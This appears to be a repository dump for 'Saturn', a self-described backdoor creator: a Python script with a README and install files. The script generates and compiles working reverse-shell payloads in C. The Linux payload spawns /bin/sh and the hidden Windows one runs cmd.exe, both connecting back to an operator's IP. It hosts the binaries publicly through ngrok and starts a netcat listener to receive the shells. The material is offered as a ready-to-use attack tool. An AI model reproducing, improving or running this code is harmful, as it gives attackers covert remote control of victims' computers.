├── README.md ├── Saturn.py ├── Server.py └── install.sh /README.md: -------------------------------------------------------------------------------- 1 | > how to use 2 | 3 | * 1. root yourself: `sudo su` 4 | * 2. run script: `python Saturn.py` 5 | 6 | 7 | # Whats going on?? 8 | 9 | 1. The script first `prints out a banner` and then asks the user to `choose an option`. The options are: 10 | * Linux (Recommended) 11 | * Windows (Harder to use) 12 | * Listen (Connect to a port) 13 | * Exit (Stop this software) 14 | 2. If the user chooses the Linux option, the script will ask for an IP address and a port number. It then writes a C program to a file named `.linux.c`. This program creates a socket, connects to the specified IP and port, and then executes a shell `(/bin/sh)`. The compiled executable is saved as Saturn-Linux. 15 | 4. If the user chooses the Windows option, the script behaves similarly but writes a C program for Windows instead. The compiled executable is saved as Saturn-Windows.exe. 16 | 5. If the user chooses the Listen option, the script `starts a netcat listener` on the specified port. 17 | 6. If the user chooses the Exit option, the script exits. 18 | 7. After creating the backdoor, the script uses ngrok to expose the local server running on port 80 to the internet. It then prints out the URL where the backdoor can be accessed. 19 | 20 | ![Screenshot 2024-01-08 12 54 25 AM](https://github.com/CPScript/Saturn/assets/83523587/925a5119-4812-4ebf-b495-a5b4d8eb9960) 21 | -------------------------------------------------------------------------------- /Saturn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | from subprocess import check_output 4 | from time import sleep 5 | import os 6 | import sys 7 | import http.server 8 | import socket 9 | import re 10 | 11 | 12 | def main(): 13 | 14 | print (""" _.oo. 15 | _.u[[/;:,. .odMMMMMM' 16 | .o888UU[[[/;:-. .o@P^ MMM^ 17 | oN88888UU[[[/;::-. dP^ 18 | dNMMNN888UU[[[/;:--. .o@P^ 19 | ,MMMMMMN888UU[[/;::-. o@^ 20 | NNMMMNN888UU[[[/~.o@P^ 21 | 888888888UU[[[/o@^-.. 22 | oI8888UU[[[/o@P^:--.. 23 | .@^ YUU[[[/o@^;::---.. 24 | oMP ^/o@P^;:::---.. 25 | .dMMM .o@^ ^;::---... 26 | dMMMMMMM@^` `^^^^ 27 | YMMMUP^ 28 | ^^ 29 | \033[1;36m 30 | ███████╗ █████╗ ████████╗██╗ ██╗██████╗ ███╗ ██╗ 31 | ██╔════╝██╔══██╗╚══██╔══╝██║ ██║██╔══██╗████╗ ██║ 32 | ███████╗███████║ ██║ ██║ ██║██████╔╝██╔██╗ ██║ 33 | ╚════██║██╔══██║ ██║ ██║ ██║██╔══██╗██║╚██╗██║ 34 | ███████║██║ ██║ ██║ ╚██████╔╝██║ ██║██║ ╚████║ 35 | ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ 36 | \033[1;36m \|BackDoor Creator |/ 37 | """) 38 | 39 | 40 | def banner(): 41 | 42 | print (""" 43 | \033[1;36m [\033[1;39m1\033[1;36m] Linux (Recemended) 44 | [\033[1;39m2\033[1;36m] Windows (Harder to use) 45 | [\033[1;39m3\033[1;36m] Listen (Connect to a port) 46 | [\033[1;39m4\033[1;36m] Exit (Stop this software) 47 | """) 48 | 49 | options = input( "\033[1;39m[Option]-->\033[1;39m") 50 | 51 | 52 | #linux 53 | if(options == '1'): 54 | 55 | host = input("\n\033[1;36mIP: \033[1;39m" ) 56 | port = input("\n\033[1;36mPORT: \033[1;39m" ) 57 | linux_shell(host, port) 58 | os.system("gcc .linux.c -o Saturn-Linux -pthread && rm -rf .linux.c") 59 | os.system("chmod +x Saturn-Linux") 60 | print("\n\033[1;36mFile Saved > \033[1;39mSaturn-Linux") 61 | #http.server 80 62 | os.system("python3 -m http.server 80 > .server 2> /dev/null &") 63 | os.system("chmod +x ngrok") 64 | name1="/Saturn-Linux" 65 | portN=80 66 | os.system("./ngrok http {} > /dev/null &".format(portN)) 67 | sleep(8) 68 | os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url') 69 | urlFile = open('link2.url', 'r') 70 | url = urlFile.read() 71 | urlFile.close() 72 | if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: 73 | print("\n\033[1;36mLINK : \033[1;39m",url+name1) 74 | 75 | print(" ") 76 | 77 | #windows 78 | if(options == '2'): 79 | 80 | 81 | host = input( "\n\033[1;36mIP: \033[1;39m" ) 82 | port = input("\n\033[1;36mPORT: \033[1;39m" ) 83 | windows_reverse(host, port) 84 | os.system("/usr/bin/i686-w64-mingw32-gcc .windows.c -o Saturn-Windows.exe -lws2_32 && rm -rf .windows.c") 85 | print("\n\033[1;36mFile Saved > \033[1;39mSaturn-Windows") 86 | 87 | #http.server 80 88 | os.system("python3 -m http.server 80 > .server 2> /dev/null &") 89 | os.system("chmod +x ngrok") 90 | name2="/Saturn-Windows.exe" 91 | portN=80 92 | os.system("./ngrok http {} > /dev/null &".format(portN)) 93 | sleep(8) 94 | os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url') 95 | urlFile = open('link2.url', 'r') 96 | url = urlFile.read() 97 | urlFile.close() 98 | if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: 99 | print("\n\033[1;36mLINK : \033[1;39m",url+name2) 100 | 101 | print(" ") 102 | 103 | if(options == '3'): 104 | port=input("\n\033[1;36mPORT: \033[1;39m") 105 | print("\n\033[1;36mWait Connection ...\n") 106 | os.system("nc -l %s" %port) 107 | print("\033[1;36m") 108 | 109 | if(options == '4'): 110 | sys.exit() 111 | os.system("fuser -k -n tcp 80") # kill port 80 112 | 113 | 114 | else : 115 | banner() 116 | 117 | 118 | 119 | 120 | 121 | def linux_shell(host, port): 122 | 123 | with open(".linux.c", "w") as file: 124 | file.write(''' 125 | #include 126 | #include 127 | #include 128 | #include 129 | 130 | int main (int argc, char **argv) 131 | { 132 | int scktd; 133 | struct sockaddr_in client; 134 | 135 | client.sin_family = AF_INET; 136 | client.sin_addr.s_addr = inet_addr("%s"); 137 | client.sin_port = htons(%s); 138 | scktd = socket(AF_INET,SOCK_STREAM,0); 139 | connect(scktd,(struct sockaddr *)&client,sizeof(client)); 140 | dup2(scktd,0); // STDIN 141 | dup2(scktd,1); // STDOUT 142 | dup2(scktd,2); // STDERR 143 | execl("/bin/sh","sh","-i",NULL,NULL); 144 | return 0; 145 | } 146 | ''' % (host, port)) 147 | 148 | 149 | def windows_reverse(host, port): 150 | with open(".windows.c", "w") as file: 151 | file.write(''' 152 | #include 153 | #include 154 | #define _WINSOCK_DEPRECATED_NO_WARNINGS 155 | #pragma comment(lib,"ws2_32") 156 | WSADATA wsaData; 157 | SOCKET Winsock; 158 | SOCKET Sock; 159 | struct sockaddr_in hax; 160 | char ip_addr[16]; 161 | STARTUPINFO ini_processo; 162 | PROCESS_INFORMATION processo_info; 163 | //int main(int argc, char *argv[]) 164 | int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdParam, int iCmdShow) 165 | { 166 | FreeConsole(); 167 | WSAStartup(MAKEWORD(2,2), &wsaData); 168 | Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); 169 | 170 | struct hostent *host; 171 | host = gethostbyname("'''+host+'''"); 172 | strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr))); 173 | hax.sin_family = AF_INET; 174 | hax.sin_port = htons(atoi("'''+port+'''")); 175 | hax.sin_addr.s_addr = inet_addr(ip_addr); 176 | WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL); 177 | memset(&ini_processo,0,sizeof(ini_processo)); 178 | ini_processo.cb=sizeof(ini_processo); 179 | ini_processo.dwFlags=STARTF_USESTDHANDLES; 180 | ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; 181 | CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&ini_processo,&processo_info); 182 | } 183 | ''') 184 | 185 | 186 | if __name__ == '__main__': 187 | main() 188 | 189 | banner() 190 | -------------------------------------------------------------------------------- /Server.py: -------------------------------------------------------------------------------- 1 | from subprocess import check_output 2 | import os 3 | from platform import system as systemos, architecture 4 | from wget import download 5 | 6 | # NGROK 7 | def Ngrok(): 8 | if True: 9 | if 'Android' in str(check_output(('uname', '-a'))) or 'arm' in str(check_output(('uname', '-a'))): 10 | filename = 'ngrok-stable-linux-arm.zip' 11 | else: 12 | ostype = systemos().lower() 13 | if architecture()[0] == '64bit': 14 | filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype) 15 | else: 16 | filename = 'ngrok-stable-{0}-386.zip'.format(ostype) 17 | url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename 18 | download(url) 19 | os.system('unzip ' + filename) 20 | os.system('rm -Rf ' + filename) 21 | os.system('clear') 22 | 23 | 24 | 25 | Ngrok() 26 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | apt-get install wget 2 | 3 | pip install wget 4 | 5 | py -m pip install wget 6 | 7 | python -m pip install wget 8 | 9 | apt-get install python3 10 | 11 | apt-get install git 12 | 13 | python3 Server.py 14 | 15 | clear 16 | 17 | python3 Saturn.py 18 | 19 | --------------------------------------------------------------------------------